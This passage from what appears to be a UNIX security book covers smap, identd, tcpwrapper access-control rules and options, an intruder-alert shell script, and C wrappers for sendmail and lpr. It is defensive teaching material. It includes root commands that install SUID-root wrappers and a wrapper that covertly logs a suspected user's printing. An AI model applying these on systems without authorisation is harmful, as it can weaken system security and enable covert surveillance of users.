rcpt To:<root@bigco.com>
250 OK

data
354 Enter mail, end with "." on a line by itself
This is a test.
.
250 Mail accepted
quit
221 Closing connection
Connection closed by foreign host.
#

12. Check to see if the mail has, in fact, been put into the /var/spool/smap directory (or whichever directory you specified).

13. Install smapd in /usr/local/etc/smapd or another suitable directory.

14. Start smapd by hand and see if the mail is delivered.

15. Modify your system's start-up files so that smapd is run automatically at system startup.

22.2.4 Possible Drawbacks

There are some drawbacks to using the smap program as described earlier. The first is that people who are contacting your site on TCP port 25 will no longer be able to execute the VRFY or EXPN SMTP commands that are supported by regular sendmail. (Actually, they will be able to execute them, but nothing useful will be returned.) These commands allow a remote client to verify that an address is local to a machine (VRFY) and to expand an alias (EXPN). Arguably, these are possible security risks, but in some environments they are useful (as we illustrate in Chapter 24, Discovering a Break-in).

Using identd

Most network servers log the hostname of the client machine that initiates the connection. Unfortunately, this is frequently not enough information. Consider what happens when someone uses telnet to connect to your machine to forge email. You may have very little hope of identifying the perpetrator other than knowing the address of the machine that originated the connection. If that machine has typical logging or supports a large number of users, even the cooperation of the administrators of that machine may not be sufficient to trace the attack back to the perpetrator.

It is because of this situation that the ident protocol was defined (in RFC 1413). The ident protocol is a service that can possibly determine the identity of a user at the other end of a network connection. When a remote client connects to a server machine, the server can open a connection back to an ident server on the client machine. The server presents the ident server with the port numbers of the connection it wishes to identify. The ident server then responds with some value that can be used later, if needed, to identify the originating account. Normally, this string is the username associated with that account. However, the administrator of the remote machine may wish to configure it to return some other value that can be used later but that does not explicitly name a user. For example, it could return an encrypted username.
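The exchange itself is a simple line-oriented dialogue on TCP port 113. As a purely illustrative example (the port number and username are invented), a mail server that has just accepted an SMTP connection from a client's port 45231 could ask the ident server on that client:

45231 , 25

and might receive a reply of the form:

45231 , 25 : USERID : UNIX : alice

which it can then record in its logs alongside the client's hostname.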

Note that identd is most definitely not a form of authentication. At best, it is a weak form of identification. The remote server may not return useful information if the service has been compromised. It also depends on the remote site administrator having installed an unmodified and working ident server - and many people do not. Some people, reasoning that ident cannot be trusted, do not allow it to return any useful information at all; they configure their servers to always return "Hillary Clinton" or "Bill Gates." However, in most instances, returning valid information is helpful. In many university environments, for instance, where the ident servers are usually monitored and under central administrative control, using ident to tag users who forge email is especially helpful.


To take advantage of ident, your software needs to know how to query the remote server, if it exists. It then needs to log that information appropriately. Modern versions of sendmail have this built in, to help cut down on mail forging. The tcpwrapper program also knows how to query ident.

Keep in mind that if you record information from an ident server, it may not be correct. In fact, if you are investigating a problem that is actually being caused by the system administrator of the remote system, he or she may have altered the ident service. The service may thus return information designed to throw you off by pointing at someone else.

Currently, identd is shipped standard with few systems. For example, it is shipped with Linux, but is not usually enabled in the /etc/inetd.conf file.

A more serious shortcoming is that versions of sendmail with built-in support for the ident protocol will no longer be able to obtain information about the sending user. The use of the ident protocol is discussed in the sidebar "Using identd".

If using ident makes sense in your environment, you won't be able to use it with smap unless you spawn smap from another wrapper that implements ident, such as the tcpwrapper program, which is described in the next section.



Chapter 22: Wrappers and Proxies

22.3 tcpwrapper

The tcpwrapper program, written by Wietse Venema, is an easy-to-use utility that you can use for logging and intercepting TCP services that are started by inetd.

22.3.1 Getting tcpwrapper

The tcpwrapper program can be downloaded from the Internet using anonymous FTP. The path is:

ftp://ftp.win.tue.nl/pub/security/tcp_wrapper_XXX.tar.gz

Where XXX is the current version number. The file that you FTP will be a tar archive compressed with gzip (and decompressed with gunzip). While you are connected to the computer ftp.win.tue.nl, you might want to pick up Venema's portmapper replacement.

Another good place to look for tcpwrapper is:

ftp://coast.cs.purdue.edu/pub/tools/tcp_wrappers

While you are connected to the coast.cs.purdue.edu machine, you can find scores of other nifty security tools and papers, so don't connect if you only have a few minutes to spare!

The tcpwrapper program is shipped standard with only a few operating systems, such as BSD/OS. (It is shipped standard with Linux but is rarely configured properly.) We hope that this situation will change in the future.

22.3.2 What tcpwrapper Does

The tcpwrapper program gives the system administrator a high degree of control over incoming TCP connections. The program is started by inetd after a remote host connects to your computer; then tcpwrapper does one or more of the following:

● Optionally sends a "banner" to the connecting client. Banners are useful for displaying legal messages or advisories.

● Performs a double-reverse lookup of the IP address, making sure that the DNS[5] entries for the IP address and hostname match. If they do not, this fact is logged. (By default, tcpwrapper is compiled with the -DPARANOID option, so the program will automatically drop the incoming connection if the two do not match, under the assumption that something somewhere is being hacked.)

[5] Domain Name Service, the distributed service that maps IP numbers to hostnames, and vice versa.

● Compares the incoming hostname and requested service with an access control list, to see if this host or this combination of host and service has been explicitly denied. If either is denied, tcpwrapper drops the connection.

● Uses the ident protocol (RFC 1413)[6] to determine the username associated with the incoming connection.

[6] RFC 1413 superseded RFC 931, but the define in the code has not changed.

● Logs the results with syslog. (For further information, see Chapter 10, Auditing and Logging.)

● Optionally runs a command. (For example, you can have tcpwrapper run finger, to get a list of users on a computer that is trying to contact yours.)

● Passes control of the connection to the "real" network daemon, or passes control to some other program that can take further action.

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (1 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.3 tcpwrapper<br />

●<br />

Transfers to a "jail" or "faux" environment where you study the user's actions.[7]<br />

[7] We won't describe this approach further. It requires some significant technical sophistication to get right, is of<br />

limited value in most environments, and may pose some potentially significant legal problems. For further<br />

information on hacker jails, see Firewalls and <strong>Internet</strong> <strong>Sec</strong>urity by Bill Cheswick and Steve Bellovin.<br />

The tcpwrapper thus gives you a way to add logging to services that are not normally logged, such as finger and systat. It also allows<br />

you to substitute different versions of a service daemon depending on the calling host - or to reject the connection without providing<br />

any server at all.<br />

22.3.3 Understanding Access Control

The tcpwrapper system has a simple but powerful language and a pair of configuration files that allow you to specify whether or not incoming connections should be accepted. The files are /etc/hosts.allow and /etc/hosts.deny. When an incoming connection is handed to tcpwrapper, the program applies the following rules:

1. The file /etc/hosts.allow is searched to see if this (host, protocol) pair should be allowed.

2. If no match is found, the file /etc/hosts.deny is searched to see if this (host, protocol) pair should be denied.

3. If no match is found, the connection is allowed.

Each line in the /etc/hosts.allow and /etc/hosts.deny files has the following format:

daemon_list : client_host_list [: shell_command]

where:

daemon_list
    Specifies the command name (argv[0]) of a list of TCP daemons (e.g., telnetd). The reserved keyword "ALL" matches all daemons; you can also use the "EXCEPT" operator (e.g., "ALL EXCEPT in.ftpd").

client_host_list
    Specifies the hostname or IP address of the incoming connection. You can also use the format username@hostname to specify a particular user on a remote computer, although the remote computer must implement the ident protocol.[8] The keyword ALL matches all clients; for a full list of keywords, see Table 22.1.

    [8] And as we noted in the discussion of ident, the identification returned is not something that can always be believed.

shell_command
    Specifies a command that should be executed if the daemon_list and client_host_list are matched. A limited amount of token expansion is available within the shell command; see Table 22.2 for a list of the tokens that are available.
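As a small illustration of the format (the domain names here are placeholders, not recommendations), a site that wants a default-deny policy might use a pair of files along these lines:

#
# /etc/hosts.allow
#
in.telnetd, in.rlogind : LOCAL, .trusted.example.com
in.ftpd : operator@gateway.trusted.example.com

#
# /etc/hosts.deny
#
ALL : ALL

Because /etc/hosts.allow is consulted first, the named services are available to local machines, to the trusted domain, and to one particular remote user; everything else falls through to the catch-all line in /etc/hosts.deny and is refused.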

Table 22.1: Special tcpwrapper Hosts

Hostname as it appears in the file /etc/hosts.allow or /etc/hosts.deny, and its effect:

ALL
    Matches all hosts.

KNOWN
    Matches any IP address that has a corresponding hostname; also matches usernames when the ident service is available.

LOCAL
    Matches any host that does not have a period (.) in its name.

PARANOID
    Matches any host for which double-reverse hostname/IP address translation does not match.

UNKNOWN
    Matches any IP address that does not have a corresponding hostname. Also matches usernames when the ident service is not available.

.subdomain.domain
    If the pattern begins with a period (.), it matches any host whose hostname ends with that string (in this case, ".subdomain.domain").

iii.  iii.jjj.  iii.jjj.kkk.  iii.jjj.kkk.lll.  (e.g., 18. or 204.17.195.)
    If the pattern ends with a period (.), it is interpreted as the beginning of an IP address. The string "18." will match any host with an IP address from 18.0.0.1 through 18.255.255.254. The string "204.17.195." will match any host with an IP address from 204.17.195.1 through 204.17.195.254.

a pattern EXCEPT another pattern
    Matches any host that is matched by a pattern except those that also match another pattern.[9]

    [9] The EXCEPT operator may also be used for specifying an Internet service.

Table 22.2: Token Expansion Available for the tcpwrapper Shell Command

Token   Mnemonic       Expands to:
%a      address        The IP address of the client.
%A      address        The IP address of the server.
%c      client info    username@hostname (if username is available); otherwise, only hostname or IP address.
%d      daemon name    The name of the daemon (argv[0]).
%h      hostname       The hostname of the client. (IP address if hostname is unavailable.)
%H      hostname       The hostname of the server. (IP address if hostname is unavailable.)
%p      process        The process ID of the daemon process.
%s      server info    daemon@host.
%u      user           The client username (or "unknown").
%%      percent        Expands to the "%" character.
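For example, the tokens can be used to produce an informative log entry from an ordinary shell command in the third field (the logger path is an assumption; adjust it for your system):

#
# /etc/hosts.deny
#
ALL : .pirate.net : (/usr/ucb/logger -t tcpd -p auth.notice "refused %d from %c") &

When a connection from that domain is refused, %d expands to the daemon name and %c to the client's user and host information, so the syslog entry records exactly who tried which service.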

NOTE: The tcpwrapper is vulnerable to IP spoofing because it uses IP addresses for authentication. The tcpwrapper also provides only limited support for UDP servers, because once the server is launched, it will continue to accept packets over the network, even if those packets come from "blocked" hosts.

22.3.4 Installing tcpwrapper

tcpwrapper is a powerful program that can seriously mess up your computer if it is not properly installed. It has many configuration options that are set at compile time. Therefore, before you start compiling or installing the program, read all of the documentation. Briefly, here is what the documentation will tell you to do:

1. You need to decide where to place the tcpwrapper program and where to place your "real" network daemons. The documentation will give you a choice. Your first option is to name the tcpwrapper program something innocuous, like /usr/local/etc/tcpd, leave the "real" network daemons in their original locations, and modify the inetd configuration file /etc/inetd.conf. Alternatively, you can move the network daemons (such as /usr/sbin/in.fingerd) to another location (such as /usr/sbin.real/in.fingerd), place the tcpwrapper in the location that the daemon formerly occupied, and leave the file /etc/inetd.conf as is.

   We recommend that you leave your executable programs where they currently are, and modify the /etc/inetd.conf file. The reason for this recommendation is that having changes in your system configuration clearly indicated in your system configuration files is less confusing than changing the names and/or the locations of your distributed system programs. In the long run, this option is much more maintainable. This is especially important if vendor patches expect to find the binary where it was originally stored, and overwrite it.

2. Having followed our advice and decided that you will modify your /etc/inetd.conf file, make a copy of the file, in case you make any mistakes later:

   # cp /etc/inetd.conf /etc/inetd.conf.DIST
   #

3. Edit tcpwrapper's Makefile so that the variable REAL_DAEMON_DIR reflects where your operating system places its network daemons. Check the other options in the Makefile to be sure they are appropriate to your needs.

4. Compile tcpwrapper.

5. Read the tcpwrapper man pages hosts_access and hosts_options. These pages define the tcpwrapper host access-control language that is used by the files /etc/hosts.allow and /etc/hosts.deny.

6. You may wish to start off with a relatively simple set of rules - for example, allowing all services to all machines except for a small group that have been known to cause problems. But you may wish to also enable complete logging, so that you can see if particular services or sites warrant further attention.

7. Create your /etc/hosts.allow and /etc/hosts.deny files. If you wish to allow all TCP servers through, you do not need to create these files at all (tcpwrapper will default to rule #3, which is to pass through all connections). If you wish to deny service from a specific machine, such as pirate.net, you could simply create a single /etc/hosts.deny file, like this:

   #
   # /etc/hosts.deny
   #
   all : pirate.net

   Alternatively, you could use the following /etc/hosts.deny, which would finger the connecting computer in pirate.net and email the result to you (security@machine.com) whenever somebody from that network tries to initiate any connection to your machine. Note that this example uses the safe_finger command that comes with tcpwrapper; this version of the finger command will remove control characters or other nasty data that might be returned from a finger server running on a remote machine, as well as limit the total amount of data received:[10]

   [10] The safe_finger program is a replacement for your system's finger program, which automatically filters out dangerous characters allowed through by the standard versions of finger. If you don't think that your standard UNIX finger program should allow data-driven attacks, you might wish to send a letter to your UNIX vendor.

   #
   # /etc/hosts.deny with more logging!
   #
   all EXCEPT in.fingerd : pirate.net : (/usr/local/bin/safe_finger -l @%h | \
           /bin/mailx -s %d-%h security@machine.com) &

   Note that the /etc/hosts.deny file allows continuation lines by using the backslash (\) character.

   The finger command is run for all services except in.fingerd; this restriction prevents a "feedback loop" in which a finger on one computer triggers a finger on a second computer, and vice versa. Also note that the finger command is run in the background; this mode prevents tcpwrapper from waiting until the safe_finger command completes.

8. Check out your /etc/syslog.conf file to make sure that tcpwrapper's events will be logged! By default, tcpwrapper will log with LOG_ERR if a program cannot be launched, LOG_WARNING if a connection is rejected, and LOG_INFO if a connection is accepted. The logging facility is LOG_MAIL, but you can change it by editing the program's Makefile. (A sample syslog.conf entry appears in the sketch following this list.)

   If you make any changes to the syslog configuration file, restart syslog with the command:

   # kill -1 `cat /etc/syslog.pid`

9. Edit your /etc/inetd.conf file so that the tcpwrapper program is invoked by inetd for each service that you wish to log and control.

   Modifying the /etc/inetd.conf file is easy: simply change the filename of each program to the full pathname of the tcpwrapper program, and edit the command name of each program so that it is the complete pathname of the original network daemon. For example, if you have a line in your original /etc/inetd.conf file that says this:

   finger stream tcp nowait nobody /usr/etc/fingerd fingerd

   Change it to this:

   finger stream tcp nowait nobody /usr/local/bin/tcpd /usr/etc/fingerd

   You may need to send a signal to the inetd daemon, or restart it, to get it to note the new configuration you have added.

10. Test to make sure that everything works! For example, try doing a finger of your computer; does a message get written into your system's log files? If not, check to make sure that inetd is starting the tcpwrapper, that tcpwrapper can access its configuration files, and that the syslog system is set up to do something with tcpwrapper's messages. (The sketch following this list shows one way to run such a test.)
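The following sketch ties steps 8 through 10 together. The log file name and the location of inetd's PID file are assumptions; substitute whatever your system actually uses. Because tcpd logs to the LOG_MAIL facility by default, a syslog.conf entry such as this one (separate the fields with tab characters on older syslogd implementations) will collect its messages, along with those of other mail-facility programs such as sendmail:

mail.info                       /var/log/tcpd.log

Then create the file, restart the daemons, and generate a test connection:

# touch /var/log/tcpd.log
# kill -1 `cat /etc/syslog.pid`
# kill -1 `cat /var/run/inetd.pid`
# finger @localhost
# tail /var/log/tcpd.log

If no entry appears in the log, work back through steps 8 and 9: check that inetd is really starting tcpd, and that syslogd was restarted after the configuration change.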



22.3.5 Advanced tcpwrapper Options

Instead of specifying a particular shell command that should be executed when a (daemon, host) line is matched, tcpwrapper allows you to specify a rich set of options. To use options, you compile the tcpwrapper program with the option -DPROCESS_OPTIONS. If you compile with -DPROCESS_OPTIONS, you must change the /etc/hosts.allow and /etc/hosts.deny files to reflect that change; the format of these files when tcpwrapper is compiled with -DPROCESS_OPTIONS is incompatible with the format of the files when tcpwrapper is compiled without the option.

If you do compile with -DPROCESS_OPTIONS, the new format of /etc/hosts.allow and /etc/hosts.deny becomes:

daemon_list : client_host_list : option : option ...

Because you may have more than one option on a line, if you need to place a colon (:) within an option, you must protect it with a backslash (\).
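For instance, a literal colon inside an option (here, a message sent back through the twist option defined in Table 22.3) must be escaped so that it is not taken as a field separator; the wording of the message is, of course, up to you:

in.ftpd : .pirate.net : twist /bin/echo "421 Connection refused\: access from your site is not permitted"

The escaped colon becomes part of the text delivered to the client rather than the start of a new option.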

The options allow you considerable flexibility in handling a variety of conditions. They also largely eliminate the need to have separate /etc/hosts.allow and /etc/hosts.deny files, as the words "allow" and "deny" are now option keywords (making it possible to deny a specific (daemon, client) pair in the /etc/hosts.allow file, or vice versa). Although you should check tcpwrapper's documentation for a current list of options, most of them are included in Table 22.3.

Table 22.3: Advanced Options for tcpwrapper When Compiled with -DPROCESS_OPTIONS

allow
    Allows the connection.

deny
    Denies the connection.

Options for dealing with sub-shells:

nice nn
    Changes the priority of the process to nn. Use numbers such as +4 or +8 to reduce the amount of CPU time allocated to network services.

setenv name value
    Sets the environment variable name to value for the daemon.

spawn shell_command
    Runs the shell_command. The streams stdin, stdout, and stderr are connected to /dev/null to avoid conflict with any communications with the client.

twist shell_command
    Runs the shell_command. The streams stdin, stdout, and stderr are connected to the remote client. This allows you to run a server process other than the one specified in the file /etc/inetd.conf. (Note: Will not work with some UDP services.)

umask nnn
    Specifies the umask that should be used for sub-shells. Specify it in octal.

user username
    Assume the privileges of username. (Note: tcpwrapper must be running as root for this option to work.)

user username.groupname
    Assume the privileges of username and set the current group to be groupname.

Options for dealing with the network connection:

banners /some/directory/
    Specifies a directory that contains banner files. If a filename is found in the banner directory that has the same name as the network server (such as telnetd), the contents of the banner file are sent to the client before the TCP connection is turned over to the server. This process allows you to send clients messages, for example, informing them that unauthorized use of your computer is prohibited.

keepalive
    Causes the UNIX kernel to periodically send a message to a client process; if the message cannot be sent, the connection is automatically broken.

linger seconds
    Specifies how long the UNIX kernel should spend trying to send a message to the remote client after the server closes the connection.

rfc931 [timeout in seconds]
    Specifies that the ident protocol should be used to attempt to determine the username of the person running the client program on the remote computer. The timeout, if specified, is the number of seconds that tcpwrapper should spend waiting for this information.


Don't be afraid of using these so-called "advanced" options: they actually allow you to have simpler configurations than separate /etc/hosts.allow and /etc/hosts.deny files do.

NOTE: The following examples use DNS hostnames for clarity. For added security, use IP addresses instead.

Suppose you wish to allow all connections to your computer except those from the computers in the domain pirate.net. You can do this with a very simple /etc/hosts.allow file:


#
# /etc/hosts.allow:
#
# Allow anybody to connect to our machine except people from pirate.net
#
all : .pirate.net : deny
all : all : allow

Suppose you wish to modify your rules to allow the use of finger from any of your internal machines, but you wish to have external finger requests met with a canned message. You might try this configuration file:

#
# /etc/hosts.allow:
#
# Allow anybody to connect to our machine except people from pirate.net
#
in.fingerd : LOCAL : allow
in.fingerd : all : twist /usr/local/bin/external_fingerd_message
all : .pirate.net : deny
all : all : allow

If you discover repeated break-in attempts through telnet and rlogin from all over the world, but you have a particular user who needs to telnet into your computer from the host sleepy.com, you could accomplish this somewhat more complex security requirement with the following configuration file:

#
# /etc/hosts.allow:
#
# Allow email from pirate.net, but nothing else:
# Allow telnet & rlogin from sleepy.com, but nowhere else
#
telnetd,rlogind : sleepy.com : allow
telnetd,rlogind : all : deny
in.fingerd : LOCAL : allow
in.fingerd : all : twist /usr/local/bin/external_fingerd_message
all : .pirate.net : deny
all : all : allow

Here's an example that combines two possible options:

#
# /etc/hosts.deny:
#
# Don't allow logins from pirate.net, and log attempts
#
telnetd,rlogind : pirate.net : spawn=(/security/logit %d deny %c %p %a %h %u)&\
        : linger 10 : banners /security/banners

In the file /security/banners/telnetd, you would have the following text:

This machine is owned and operated by the Big Whammix Corporation for the exclusive use of Big Whammix Corporation employees. Your attempt to access this machine is not allowed.

Access to Big Whammix Corporation computers is logged and monitored. If you use or attempt to use a Big Whammix computer system, you consent to such monitoring and to adhere to Big Whammix Corporation policies about appropriate use. If you do not agree, then do not attempt use of these systems. Unauthorized use of Big Whammix Corporation computers may be in violation of state or Federal law, and will be prosecuted.

If you have any questions about this message or policy, contact or call during EST business hours: 1-800-555-3662.

The banner will be displayed if anyone from pirate.net tries to log in over the net. The system will pause 10 seconds for the message to be fully displayed before disconnecting.

In the /security/logit shell file, you could have something similar to the script in Example 22.1. This script puts an entry into the syslog about the event, and attempts to raise a very visible alert window on the screen of the security administrator's workstation. Furthermore, it does a reverse finger on the calling host, and for good measure does a netstat and ps on the local machine. This process is done in the event that some mischief is already occurring that hasn't triggered an alarm.

Note the -n option to the netstat command in the script. This is because DNS can be slow to resolve all the IP numbers to names. You want the command to complete before the connection is dropped; it is always possible to look the hostnames up later from the log file.

Example 22.1: alert Script

#!/bin/ksh
set -o nolog -u -h +a +o bgnice +e -m

# Bmon is intended to capture some information about whatever site is
# twisting my doorknob. It is probably higher overhead than I need,
# but...

export PATH=/usr/ucb:/usr/bin:/bin:/usr/etc:/etc

mkdir /tmp/root
# Create /tmp/root in case it doesn't exist.

print "Subject: Notice\nFrom: operator\n\n$@" | /usr/lib/sendmail security

typeset daemon="$1" status="$2" client="$3" pid=$4 addr=$5 host=$6 user=$7

# For most things, we simply want a notice.
# Unsuccessful attempts are warnings
# Unsuccessful attempts on special accounts merit an alert
typeset level=notice
[[ $status != allow ]] && level=warning
[[ $daemon = in.@(rshd|rlogind) && $user = @(root|security) ]] && level=alert

/usr/ucb/logger -t tcpd -p auth.$level "$*" &

umask 037

# Pick an unused log file name of the form /security/log.<pid>.<nnn>,
# record it in the global variable $logfile, and set its group.
function mktemp {
    typeset temp=/security/log.$$
    typeset -Z3 suffix=0

    while [[ -a $temp.$suffix ]]
    do
        let suffix+=1
    done
    logfile=$temp.$suffix
    touch $logfile
    chgrp security $logfile
}

# Indent each line read from stdin and append it to the log file.
function Indent {
    sed -e 's/^/    /' >> $logfile
}

mktemp

exec 3>&1 >>$logfile 2>&1

date
print "Remote host: $host Remote user: $user"
print ""
print "Local processes:"
ps axg | Indent
print ""
print "Local network connections:"
netstat -n -a -f inet | Indent
print ""
print "Finger of $host"
safe_finger -s @$host | Indent
print ""
[[ $user != unknown ]] && safe_finger -h -p -m $user@$host | Indent

exec >> /netc/log/$daemon.log 2>&1
print "-----------------------"
print "\npid=$pid client=$client addr=$addr user=$user"
print Details in $logfile
date
print ""

# Now bring up an alert box on the admin's workstation
{
    print "\ndaemon=$daemon client=$client addr=$addr user=$user"
    print Details in $logfile
    date
    print ""
    print -n "(press return to close window.)" >> /tmp/root/alert.$$
} > /tmp/root/alert.$$

integer lines=$(wc -l < /tmp/root/alert.$$ | tr -d ' ')
xterm -display security:0 -fg white -bg red -fn 9x15 -T "ALERT" -fn 9x15B \
    -geom 60x$lines+20+20 -e sh -c "cat /tmp/root/alert.$$;read nothing"
/bin/rm /tmp/root/alert.$$

22.3.6 Making Sense of Your tcpwrapper Configuration Files

The configuration files we have shown earlier are simple; unfortunately, sometimes things get complicated. The tcpwrapper system comes with a utility called tcpdchk that will scan through your configuration file and report on a wide variety of potential configuration errors.

The tcpwrapper system comes with another utility program called tcpdmatch, which allows you to simulate an incoming connection and determine if the connection would be permitted or blocked with your current configuration files.
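For example, you might check your files and then simulate a few connections; the hostnames here are placeholders, and the exact output depends on the version of tcpwrapper you installed:

# tcpdchk -v
# tcpdmatch in.telnetd pirate.net
# tcpdmatch in.fingerd client.trusted.example.com

tcpdchk -v lists each access-control rule as it is parsed and warns about problems such as unknown daemon names or syntax errors; tcpdmatch reports which rule, if any, an incoming (daemon, client) pair would match and whether the connection would be granted.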

Programs like tcpdchk and tcpdmatch are excellent complements to the security program tcpwrapper, because they help you head off security problems before they happen. Wietse Venema is to be complimented for thinking to write and include them in his tcpwrapper release; other programmers should follow his example.



22.6 Writing Your Own Wrappers

In this section, we describe the reasons for writing your own wrappers. In most cases, you won't need to write your own wrappers; you'll find that the standard UNIX wrappers will suit most situations.

22.6.1 Wrappers That Provide Temporary Patches

A typical case in which you might want to build a wrapper yourself is when there is a report of a new bug in some existing software on your system that is triggered or aggravated when an environment variable or input is uncontrolled. By writing a small wrapper, you can filter what reaches the real program, and you can reset its environment. The software can thus continue to be used until such time as your vendor releases a formal patch.

The code in Example 22.2 is an example of such a wrapper. It was originally written by Wietse Venema and released as part of CERT Advisory 11, in 1992. An unexpected interaction between Sun Microsystems' shared library implementation and various SUID and SGID programs could result in unauthorized privileges being granted to users. The temporary fix to the problem was to put a wrapper program around susceptible programs (such as the sendmail program) to filter out environment variables that referenced unauthorized shared libraries - those variables beginning with the characters "LD_".

Example 22.2: Wrapper Program for sendmail

/* Start of C program source */

/* Change the next line to reflect the full pathname
   of the file to be protected by the wrapper code */
#define COMMAND "/usr/lib/sendmail.dist"
#define VAR_NAME "LD_"

main(argc,argv,envp)
int argc;
char **argv;
char **envp;
{
    register char **cpp;
    register char **xpp;
    register char *cp;

    /* Delete every environment variable whose name begins with "LD_" */
    for (cpp = envp; cp = *cpp; ) {
        if (strncmp(cp, VAR_NAME, strlen(VAR_NAME)) == 0) {
            for (xpp = cpp; xpp[0] = xpp[1]; xpp++)
                /* void */ ;
        } else {
            cpp++;
        }
    }
    execv(COMMAND, argv);
    perror(COMMAND);
    exit(1);
}

/* End of C program source */

To use this code, you would compile it, move the original sendmail to a safe location, and then install the wrapper in place of the real program. For the example above, you would issue the following commands as the superuser:

# make wrapper
# mv /usr/lib/sendmail /usr/lib/sendmail.dist
# chmod 100 /usr/lib/sendmail.dist
# mv ./wrapper /usr/lib/sendmail
# chown root /usr/lib/sendmail
# chmod 4711 /usr/lib/sendmail

22.6.2 Wrappers That Provide Extra Logging

Another case in which you might want to build your own wrapper code is when you wish to do some extra logging of a program execution, or to perform additional authentication of a user. The use of a wrapper allows you to do this without modifying the underlying code.

Suppose you suspect some user of your system of misusing the system's printer. You wish to gain some additional log information to help you determine what is being done. So, you might use a wrapper such as the one in Example 22.3.

Example 22.3: A Logging Wrapper

/* Start of C program source */

/* Change the next line to reflect the full pathname
   of the file to be protected by the wrapper code */
#define COMMAND "/usr/lib/.hidden/lpr"

#include <syslog.h>

main(argc,argv,envp)
int argc;
char **argv, **envp;
{
    int iloop;

    /* Record the invocation, each (truncated) argument, and the real UID */
    openlog("xtra-log", LOG_PID, LOG_LPR);
    syslog(LOG_INFO, "lpr invoked with %d arguments", argc);
    for (iloop = 1; iloop < argc; iloop++) {
        if (strlen(argv[iloop]) > 1023) argv[iloop][1023] = 0;
        syslog(LOG_INFO, "arg %d is `%s'", iloop, argv[iloop]);
    }
    syslog(LOG_INFO, "uid is %d", getuid());
    closelog();

    execv(COMMAND, argv);
    perror(COMMAND);
    exit(1);
}

/* End of C program source */

To use this code, you follow the same basic steps as in the previous example: you compile the code, make the hidden directory, move the original lpr to a safe location, and then install the wrapper in place of the real program. For this example, you might issue the following commands as the superuser:

# make wrapper
# mkdir /usr/lib/.hidden
# chmod 700 /usr/lib/.hidden
# mv /usr/bin/lpr /usr/lib/.hidden/lpr
# chmod 100 /usr/lib/.hidden/lpr
# mv ./wrapper /usr/bin/lpr
# chown root /usr/bin/lpr
# chmod 4711 /usr/bin/lpr

Now, whenever someone executes the lpr command, you will find a copy of the arguments and other useful information in the syslog. See Chapter 10, Auditing and Logging, for more information on syslog and other logging facilities.

The above example can be modified in various ways to do other logging, change directories, or perform other checks and changes that might be necessary for what you want to do.

You can also adopt the concept we've discussed to put a wrapper around shell files you want to make SUID. As we noted in Chapter 5, The UNIX Filesystem, on most older UNIX systems, SUID shell files are a security problem. You can create a wrapper that is SUID, cleans up the environment (including resetting the PATH variable and removing IFS), and then exec's the shell file from a protected directory. In this way, you'll get all of the benefits of a SUID shell file, and fewer (but, alas, still some) of the dangers.
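As an illustration only, here is a minimal sketch of such a wrapper, written in the same spirit as the earlier examples. The script pathname and the PATH value are assumptions you would change for your own site; the essential points are that the inherited environment is thrown away completely (so IFS and any LD_ variables vanish) and that only a known-safe PATH is handed to the script.

/* Start of C program source */

/* Change the next line to reflect the full pathname
   of the protected shell script to be run by the wrapper */
#define SCRIPT "/usr/local/lib/protected/report.sh"

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    /* A minimal, known-safe environment; IFS is deliberately omitted. */
    static char *clean_env[] = {
        "PATH=/bin:/usr/bin",
        (char *) 0
    };

    /* Run the script with the caller's arguments but the clean environment */
    execve(SCRIPT, argv, clean_env);
    perror(SCRIPT);
    exit(1);
}

/* End of C program source */

You would then install the wrapper SUID, exactly as in the two previous examples, and keep the script itself in a directory that ordinary users cannot write to or list.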



Part VI: Handling Security Incidents

This part of the book contains instructions for what to do if your computer's security is compromised. These chapters will also help system administrators protect their systems from authorized users who are misusing their privileges.

● Chapter 24, Discovering a Break-in, contains step-by-step directions to follow if you discover that an unauthorized person is using your computer.

● Chapter 25, Denial of Service Attacks and Solutions, describes ways that legitimate, authorized users can make your system inoperable, ways that you can find out who is doing what, and what to do about it.

● Chapter 26, Computer Security and U.S. Law. Occasionally the only thing you can do is sue or try to have your attackers thrown into jail. This chapter describes the legal recourse you may have after a security breach and discusses why legal approaches are often not helpful. It also covers some emerging concerns about running server sites connected to a wide area network such as the Internet.

● Chapter 27, Who Do You Trust?, is a concluding chapter that makes the point that somewhere along the line, you need to trust a few things and people in order to sleep at night. Are you trusting the right ones?


Part VII: Appendixes

These appendixes provide a number of useful checklists and references.

● Appendix A, UNIX Security Checklist, contains a point-by-point list of many of the suggestions made in the text of the book.

● Appendix B, Important Files, is a list of the important files in the UNIX filesystem, and a brief discussion of their security implications.

● Appendix C, UNIX Processes, is a technical discussion of how the UNIX system manages processes. It also describes some of the special attributes of processes, including the UID, GID, and SUID.

● Appendix D, Paper Sources, lists books, articles, and magazines about computer security.

● Appendix E, Electronic Resources, is a brief listing of some significant security tools to use with UNIX, including directions on where to find them on the Internet.

● Appendix F, Organizations, contains the names, telephone numbers, and addresses of organizations that are devoted to seeing computers become more secure.

● Appendix G, Table of IP Services, lists the common TCP/IP protocols, along with their port numbers and suggested handling by a firewall.


Appendix B: Important Files

Contents:
Security-Related Devices and Files
Important Files in Your Home Directory
SUID and SGID Files

This appendix lists some of the files on UNIX systems that are important from the perspective of overall system security. We have tried to make this as comprehensive a list as possible. Nevertheless, there are doubtless some system-specific files that we have omitted. If you don't see a file here that you think should be added, please let us know.

B.1 Security-Related Devices and Files

This section lists many of the devices, files, and programs mentioned in this book. Note that these programs and files may be located in different directories under your version of UNIX.

B.1.1 Devices

All UNIX devices potentially impact security. You should, however, pay special attention to the following entries. On many systems, including SVR4, these entries are links to files in the /devices directory, but the actual names in that directory depend on the underlying hardware configuration. Thus, we will refer to them by their /dev names.

Name              Description
/dev/audio        Audio input/output device
/dev/console      System console
/dev/*diskette*   Floppy disk device
/dev/dsk/*        System disks
/dev/fbs/*        Framebuffers
/dev/fd/*         File descriptors (/dev/fd/0 is a synonym for stdin, /dev/fd/1 for stdout, etc.)
/dev/*fd*         Floppy disk drives
/dev/ip           IP interface
/dev/kbd          Keyboard device
/dev/klog         Kernel log device
/dev/kmem         Kernel memory
/dev/kstat        Kernel statistics device
/dev/log          Log device
/dev/mem          Memory
/dev/modem        Modem
/dev/null         Null device
/dev/pty*         Pseudo terminals
/dev/random       Random device
/dev/rdsk         Raw disk devices
/dev/rmt8         Tape device
/dev/*sd*         SCSI disks
/dev/*st*         SCSI tapes
